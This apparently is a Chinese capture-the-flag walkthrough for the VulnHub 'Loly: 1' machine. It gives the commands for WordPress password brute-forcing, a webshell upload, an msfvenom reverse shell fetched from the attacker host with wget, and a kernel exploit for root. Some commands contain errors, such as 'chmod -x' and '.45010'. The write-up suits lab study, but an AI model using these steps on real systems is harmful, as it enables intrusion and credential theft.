靶机地址: https://www.vulnhub.com/entry/loly-1,538/
Kali IP:172.16.12.129
1.主机发现
Nmap -sP 172.16.12.0/24
2.端口扫描
nmap -P 172.16.12.130
3.访问
4.目录扫描
dirb http://172.16.12.130/
扫描到/wordpress
5.爆破wordpress用户名和密码
wpscan --url http://172.16.12.130/wordpress -e
爆破密码
wpscan --url http://172.16.12.130/wordpress -U loly -P /usr/share/wordlists/rockyou.txt
6. 访问http://172.16.12.130/wordpress/wp-login.php
判断loly.lc是域名
7. 修改/etc/hosts文件
vim /etc/hosts
8.登录
9. 发现AdRotate的Manage Media中有一个上传文件的地方
10. 写一个木马并压缩,上传
11.访问http://172.16.12.130/wordpress/wp-content/banners/123.php,连接蚁剑
12. 查看靶机上的/var/www/html/wordpress/wp-config.php文件,发现数据库密码为
Lolyisabeautifulgirl
13. 连接msf
利用msf生成反弹连接木马
msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.12.129 lport=4444 -o shell.php
开放python简易下载模块
python -m http.server 888
蚁剑下载反弹连接木马
wget 172.16.12.129:888/shell.php
14.开启msf监听
msfconsole
use multi/handler
set lhost 172.16.12.129
set payload php/meterpreter/reverse_tcp
run
15.访问http://172.16.12.130/wordpress/shell.php,因为我木马下载到了wordpress下,所以我访问这个地址
Msf连接成功
16. 利用交互式shell成功提权www用户
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
17.切换loly用户
su loly
18. 查看内核版本 找一下有没有漏洞
uname -a
searchsploit ubuntu 16.04
将对应木马复制进本地
searchsploit -m 45010.c
开启python简易http服务
python -m http.server 888
19. 靶机下载木马并执行
wget 172.16.12.129:888/45010.c
增加执行权限
chmod -x 45010.c
执行
gcc 45010.c -o 45010
.45010
20.查看flag
cat /root/root.txt